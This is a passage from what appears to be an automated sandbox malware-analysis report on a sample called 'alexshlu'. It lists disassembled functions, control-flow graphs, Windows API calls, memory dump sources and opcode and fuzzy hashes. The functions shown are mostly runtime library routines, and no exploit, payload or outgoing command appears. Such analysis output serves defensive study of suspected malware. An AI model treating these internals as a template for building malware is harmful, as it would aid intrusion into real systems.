                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2502d53a253e0d97f845a4d74a84b87fcce3e1ee5bcebcb4b18edd2153036da
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73014C35F501047BDB007B65AC07FAF7764DB42755F004425FA08B62C2FA75AA308AD4
                                                                                                                                                                                                                                        Function 002B3E7D Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 219 2b3e7d-2b3e88 220 2b3e8a-2b3e9d call 2b6211 call 2b68fc 219->220 221 2b3e9e-2b3eb1 call 2b3f0e 219->221 227 2b3edf 221->227 228 2b3eb3-2b3ed0 CreateThread 221->228 232 2b3ee1-2b3eed call 2b3f5e 227->232 230 2b3eee-2b3ef3 228->230 231 2b3ed2-2b3ede GetLastError call 2b6237 228->231 233 2b3efa-2b3efe 230->233 234 2b3ef5-2b3ef8 230->234 231->227 233->232 234->233
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateThread.KERNELBASE(?,?,Function_00013F95,00000000,?,?), ref: 002B3EC6
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002B3ED2
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002B3ED9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2744730728-0
                                                                                                                                                                                                                                        • Opcode ID: 12b03d87151fd6d62d1bc69c9b02c7e0eb30c7ee93b2660a79732cc35929a978
                                                                                                                                                                                                                                        • Instruction ID: fc8e06517b940013f30401089b689e49333513fe39fd8b18fb11bca74f1d077c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12b03d87151fd6d62d1bc69c9b02c7e0eb30c7ee93b2660a79732cc35929a978
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2019E7292021AAFDF15DFA5DC0AAEE3BB5EF40390F004159F80196190EB71CF60DB90
                                                                                                                                                                                                                                        Function 002C2520 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 239 2c2520-2c2542 240 2c2548-2c254a 239->240 241 2c2735 239->241 243 2c254c-2c256b call 2b6aa5 240->243 244 2c2576-2c2599 240->244 242 2c2737-2c273b 241->242 252 2c256e-2c2571 243->252 245 2c259f-2c25a5 244->245 246 2c259b-2c259d 244->246 245->243 248 2c25a7-2c25b8 245->248 246->245 246->248 250 2c25ba-2c25c8 call 2c12d0 248->250 251 2c25cb-2c25db call 2c284d 248->251 250->251 257 2c25dd-2c25e3 251->257 258 2c2624-2c2636 251->258 252->242 261 2c260c-2c2622 call 2c28ca 257->261 262 2c25e5-2c25e8 257->262 259 2c268d-2c26ad WriteFile 258->259 260 2c2638-2c263e 258->260 263 2c26af-2c26b5 GetLastError 259->263 264 2c26b8 259->264 266 2c2679-2c2686 call 2c2cf9 260->266 267 2c2640-2c2643 260->267 278 2c2605-2c2607 261->278 268 2c25ea-2c25ed 262->268 269 2c25f3-2c2602 call 2c2c91 262->269 263->264 271 2c26bb-2c26c6 264->271 277 2c268b 266->277 272 2c2665-2c2677 call 2c2ebd 267->272 273 2c2645-2c2648 267->273 268->269 274 2c26cd-2c26d0 268->274 269->278 279 2c26c8-2c26cb 271->279 280 2c2730-2c2733 271->280 285 2c2660-2c2663 272->285 281 2c26d3-2c26d5 273->281 282 2c264e-2c265b call 2c2dd4 273->282 274->281 277->285 278->271 279->274 280->242 286 2c26d7-2c26dc 281->286 287 2c2703-2c270f 281->287 282->285 285->278 290 2c26de-2c26f0 286->290 291 2c26f5-2c26fe call 2b629d 286->291 292 2c2719-2c272b 287->292 293 2c2711-2c2717 287->293 290->252 291->252 292->252 293->241 293->292
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002C28CA: GetConsoleOutputCP.KERNEL32(DAA4AEFB,00000000,00000000,?), ref: 002C292D
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,002B7097,?), ref: 002C26A5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,002B7097,?,002B72DB,00000000,?,00000000,002B72DB,?,?,?,002D4DE0,0000002C,002B71C7,?), ref: 002C26AF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2915228174-0
                                                                                                                                                                                                                                        • Opcode ID: 5525905a634b39bf4b5a7a38772f0a3a26c63dc0017007192fa957bfaf7ddc7b
                                                                                                                                                                                                                                        • Instruction ID: b2de1c04f91b97ede81ef4583b59ca32d41cc08df654d70faaf767de10d60726
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5525905a634b39bf4b5a7a38772f0a3a26c63dc0017007192fa957bfaf7ddc7b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5961B371D2011AEFDF15CFA8D984FEEBBB9AF09304F140249E804A7251DB71D929DBA0
                                                                                                                                                                                                                                        Function 002C2CF9 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 296 2c2cf9-2c2d4e call 2ae300 299 2c2d50 296->299 300 2c2dc3-2c2dd3 call 2a986f 296->300 302 2c2d56 299->302 304 2c2d5c-2c2d5e 302->304 305 2c2d78-2c2d9d WriteFile 304->305 306 2c2d60-2c2d65 304->306 309 2c2d9f-2c2daa 305->309 310 2c2dbb-2c2dc1 GetLastError 305->310 307 2c2d6e-2c2d76 306->307 308 2c2d67-2c2d6d 306->308 307->304 307->305 308->307 309->300 311 2c2dac-2c2db7 309->311 310->300 311->302 312 2c2db9 311->312 312->300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,002C268B,00000000,002B72DB,?,00000000,?,00000000), ref: 002C2D95
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C268B,00000000,002B72DB,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,002B7097), ref: 002C2DBB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 442123175-0
                                                                                                                                                                                                                                        • Opcode ID: 5730c7a63acf52d6a4a6bdbfa713032f6f748404bc788f8ea423e0a350d67f67
                                                                                                                                                                                                                                        • Instruction ID: 8ff20d212fc44725c6927da94eda3bfba852611bead31952646c90b32a49249d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5730c7a63acf52d6a4a6bdbfa713032f6f748404bc788f8ea423e0a350d67f67
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B218030A10219DFCF15CF29DC80EE9B7B9EB59301B1445AEE906D7211DA30DE568F60
                                                                                                                                                                                                                                        Function 002BC3D2 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 313 2bc3d2-2bc3d7 314 2bc3d9-2bc3f1 313->314 315 2bc3ff-2bc408 314->315 316 2bc3f3-2bc3f7 314->316 318 2bc41a 315->318 319 2bc40a-2bc40d 315->319 316->315 317 2bc3f9-2bc3fd 316->317 321 2bc474-2bc478 317->321 320 2bc41c-2bc429 GetStdHandle 318->320 322 2bc40f-2bc414 319->322 323 2bc416-2bc418 319->323 324 2bc42b-2bc42d 320->324 325 2bc456-2bc468 320->325 321->314 326 2bc47e-2bc481 321->326 322->320 323->320 324->325 327 2bc42f-2bc438 GetFileType 324->327 325->321 328 2bc46a-2bc46d 325->328 327->325 329 2bc43a-2bc443 327->329 328->321 330 2bc44b-2bc44e 329->330 331 2bc445-2bc449 329->331 330->321 332 2bc450-2bc454 330->332 331->321 332->321
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,002BC2C1,002D5160), ref: 002BC41E
                                                                                                                                                                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,002BC2C1,002D5160), ref: 002BC430
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3000768030-0
                                                                                                                                                                                                                                        • Opcode ID: 8d0ca04e11dffbe5e4f4c14111889cf69b2033b3f49863c57576233a949902b5
                                                                                                                                                                                                                                        • Instruction ID: 2de226d34a3522578537d606a851cc683d5abd5e901cb483cbd95fdc58b8260f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d0ca04e11dffbe5e4f4c14111889cf69b2033b3f49863c57576233a949902b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3110A715347424AC7308E3E9CA82B27EB4A7563F0B380B6AD0F6D26F2C670CA95D545
                                                                                                                                                                                                                                        Function 002B3F95 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(002D4C30,0000000C), ref: 002B3FA8
                                                                                                                                                                                                                                        • ExitThread.KERNEL32 ref: 002B3FAF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1611280651-0
                                                                                                                                                                                                                                        • Opcode ID: b7797c760c4d9c9d7e9d4b6d66766e0c2dcec7b64b23f971f04a9f7d7aabdf50
                                                                                                                                                                                                                                        • Instruction ID: b61bc23396c4c9fb270ec15bac6b84f1d8d2a95763acac5dd8b235d1e330c8a5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7797c760c4d9c9d7e9d4b6d66766e0c2dcec7b64b23f971f04a9f7d7aabdf50
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54F08C71D20209AFDB01EF70E80AAAE7B74EF01380F20404AF40297691DB759E208FA1
                                                                                                                                                                                                                                        Function 002AAF05 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 352 2aaf05-2aaf1f 353 2aaf28-2aaf30 352->353 354 2aaf21-2aaf23 352->354 356 2aaf32-2aaf3c 353->356 357 2aaf51-2aaf55 353->357 355 2ab001-2ab00e call 2a986f 354->355 356->357 364 2aaf3e-2aaf4f 356->364 360 2aaf5b-2aaf6c call 2ab795 357->360 361 2aaffd 357->361 368 2aaf6e-2aaf72 360->368 369 2aaf74-2aafa8 360->369 365 2ab000 361->365 366 2aafca-2aafcc 364->366 365->355 366->365 370 2aafbb call 2aa866 368->370 375 2aafaa-2aafad 369->375 376 2aafce-2aafd6 369->376 373 2aafc0-2aafc7 370->373 373->366 375->376 377 2aafaf-2aafb3 375->377 378 2aafeb-2aaffb 376->378 379 2aafd8-2aafe9 call 2b7f3a 376->379 377->361 380 2aafb5-2aafb8 377->380 378->365 379->361 379->378 380->370
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1efe3fdbc52939c4402aec456f40eda415279a0af6585d48344c7cb4ee898ada
                                                                                                                                                                                                                                        • Instruction ID: 75df6c87bd35263614370e4d4526b2e647a4a9d582f7e0c7a1d7869f0860189d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1efe3fdbc52939c4402aec456f40eda415279a0af6585d48344c7cb4ee898ada
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D31B87252411BAFCF15CF68C8448EDB7B8BF0A324B144226E512E3690DB31F954CB91
                                                                                                                                                                                                                                        Function 002BB97D Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 439 2bb97d-2bb9a7 440 2bb9a9-2bb9ab 439->440 441 2bb9ad-2bb9af 439->441 442 2bb9fe-2bba01 440->442 443 2bb9b1-2bb9b3 441->443 444 2bb9b5-2bb9bc call 2bb8b2 441->444 443->442 446 2bb9c1-2bb9c5 444->446 447 2bb9c7-2bb9d5 GetProcAddress 446->447 448 2bb9e4-2bb9fb 446->448 447->448 450 2bb9d7-2bb9e2 call 2b132f 447->450 449 2bb9fd 448->449 449->442 450->449
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: da8d88e6b47dcc0e88e3703f429506f7b96d23ac6333affbcf3e88fedb7d0ef6
                                                                                                                                                                                                                                        • Instruction ID: bbacbb985c02ddd3a85488f619085ceb500ed8ba33925521eea23d0f272989a6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da8d88e6b47dcc0e88e3703f429506f7b96d23ac6333affbcf3e88fedb7d0ef6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B01F9336215155F9B138F69FC5999A33A5FBC57A03244125F61087154DB71AC208B90
                                                                                                                                                                                                                                        Function 002AE32B Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __RTC_Initialize.LIBCMT ref: 002AE35D
                                                                                                                                                                                                                                          • Part of subcall function 002AE61A: InitializeSListHead.KERNEL32(002D8008,002AE382), ref: 002AE61F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize$HeadList
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 394358367-0
                                                                                                                                                                                                                                        • Opcode ID: bdf119c15e06e7ce384657c3c6b1a91df56f41792d611b4092bbd36c9aa3a4e1
                                                                                                                                                                                                                                        • Instruction ID: 0a6ece1a563efadfc655c0d6ca93163d23a844688a4e6dcf9947712225146a97
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdf119c15e06e7ce384657c3c6b1a91df56f41792d611b4092bbd36c9aa3a4e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F301AF519303031BDC653BF6181BBAF020D0F63B95F461C46B9509B087EE5AD8BA8C73
                                                                                                                                                                                                                                        Function 002AAEF7 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 453 2aaef7-2aaefc 454 2aaf4a-2aaf50 453->454 455 2aaefe-2aaf03 call 2b13b8 453->455 457 2aaf52 454->457 458 2aaed5 454->458 460 2aaf04 455->460 462 2aafa0-2aafa8 457->462 463 2aaf54-2aaf5c 457->463 459 2aaed7-2aaee4 458->459 458->460 465 2aafaa-2aafad 462->465 466 2aafce-2aafd6 462->466 465->466 467 2aafaf-2aafb3 465->467 468 2aafeb-2aaffb 466->468 469 2aafd8-2aafe9 call 2b7f3a 466->469 470 2aaffd 467->470 471 2aafb5-2aafbb call 2aa866 467->471 473 2ab000-2ab00e call 2a986f 468->473 469->468 469->470 470->473 479 2aafc0-2aafcc 471->479 479->473
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3988221542-0
                                                                                                                                                                                                                                        • Opcode ID: d269956e5249d2e02b1144e0c10f211bc2ea1b41235a47cbbe63c1b67ec4cf83
                                                                                                                                                                                                                                        • Instruction ID: 748be7084368db7dc983bd825575b194b1db3d12ece256130bb6322a21f50200
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d269956e5249d2e02b1144e0c10f211bc2ea1b41235a47cbbe63c1b67ec4cf83
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1101F4B666C25B1FDB19DE39E9266A8BB50EF97334B2041AFD012C88C2EF135870D611
                                                                                                                                                                                                                                        Function 002BBC50 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,002BAB70,00000001,00000364,?,00000005,000000FF,?,002B3FBA,002D4C30,0000000C), ref: 002BBC91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
